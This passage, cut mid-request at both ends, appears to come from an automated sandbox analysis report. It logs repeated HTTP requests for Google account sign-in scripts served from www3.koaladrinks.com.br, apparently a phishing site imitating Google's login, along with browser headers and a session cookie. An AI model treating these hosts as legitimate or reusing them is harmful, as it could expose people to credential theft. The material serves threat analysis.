0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=pxq3x HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=EFQ78c,IZT63,K0PMbc,KUM7Z,L9OGUe,LDQI,LEikZe,MpJwZc,PrPYRd,Rkm0ef,SCuOPb,SpsfSb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,_b,_tp,aC1iue,byfTOb,cYShmd,cciGGe,hc6Ubd,lsjVmc,lwddkf,m9oV,n73qwf,pxq3x,qmdT9,siKnQd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,y5vRwf,zbML3c,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=f8Gu1e HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=EFQ78c,IZT63,K0PMbc,KUM7Z,L9OGUe,LDQI,LEikZe,MpJwZc,PrPYRd,Rkm0ef,SCuOPb,SpsfSb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,_b,_tp,aC1iue,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,lsjVmc,lwddkf,m9oV,n73qwf,pxq3x,qmdT9,siKnQd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,y5vRwf,zbML3c,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=K1ZKnb,ziZ8Mc,b3kMqb,mvkUhe,CMcBD,Fndnac,t2srLd,EN3i8d,z0u0L,xiZRqc HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlHib1bm8jnmMUUG53bjMxb43esJQQ/m=_b,_tp HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=EFQ78c,IZT63,K0PMbc,KUM7Z,L9OGUe,LDQI,LEikZe,MpJwZc,PrPYRd,Rkm0ef,SCuOPb,SpsfSb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,_b,_tp,aC1iue,byfTOb,cYShmd,cciGGe,hc6Ubd,lsjVmc,lwddkf,m9oV,n73qwf,qmdT9,siKnQd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,y5vRwf,zbML3c,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=pxq3x HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=CMcBD,EFQ78c,EN3i8d,Fndnac,IZT63,K0PMbc,K1ZKnb,KUM7Z,L9OGUe,LDQI,LEikZe,MpJwZc,PrPYRd,Rkm0ef,SCuOPb,SpsfSb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,_b,_tp,aC1iue,b3kMqb,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,lsjVmc,lwddkf,m9oV,mvkUhe,n73qwf,pxq3x,qmdT9,siKnQd,t2srLd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,xiZRqc,y5vRwf,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=ltDFwf,SD8Jgb,rmumx,E87wgc,qPYxq,Tbb4sb,soHxf,YgOFye,oqkvIf,yRXbo,bTi8wc,ywOR5c,PHUIyb HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=_b,_tp/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=byfTOb,lsjVmc,LEikZe HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=EFQ78c,IZT63,K0PMbc,KUM7Z,L9OGUe,LDQI,LEikZe,MpJwZc,PrPYRd,Rkm0ef,SCuOPb,SpsfSb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,_b,_tp,aC1iue,byfTOb,cYShmd,cciGGe,hc6Ubd,lsjVmc,lwddkf,m9oV,n73qwf,pxq3x,qmdT9,siKnQd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,y5vRwf,zbML3c,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=f8Gu1e HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,IZT63,K0PMbc,K1ZKnb,KUM7Z,L9OGUe,LDQI,LEikZe,MpJwZc,PHUIyb,PrPYRd,Rkm0ef,SCuOPb,SD8Jgb,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,_b,_tp,aC1iue,b3kMqb,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oqkvIf,pxq3x,qPYxq,qmdT9,rmumx,siKnQd,soHxf,t2srLd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=p3hmRc,LvGhrf,RqjULd HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,IZT63,K0PMbc,K1ZKnb,KUM7Z,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,PHUIyb,PrPYRd,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,_b,_tp,aC1iue,b3kMqb,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oqkvIf,p3hmRc,pxq3x,qPYxq,qmdT9,rmumx,siKnQd,soHxf,t2srLd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=ZDZcre,OTA3Ae,xUdipf,NwH0H,w9hDv,A7fCU HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=LEikZe,_b,_tp,byfTOb,lsjVmc/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=n73qwf,SCuOPb,IZT63,vfuNJf,UUJqVe,ws9Tlc,siKnQd,cciGGe,m9oV,vjKJJ,y5vRwf,L9OGUe,PrPYRd,MpJwZc,cYShmd,hc6Ubd,Rkm0ef,KUM7Z,WpP9Yc,lwddkf,SpsfSb,aC1iue,EFQ78c,xQtZb,zbML3c,zr1jrb,vHEMJe,YHI3We,YTxL4,Uas9Hd,zy0vNb,K0PMbc,qmdT9,LDQI HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET 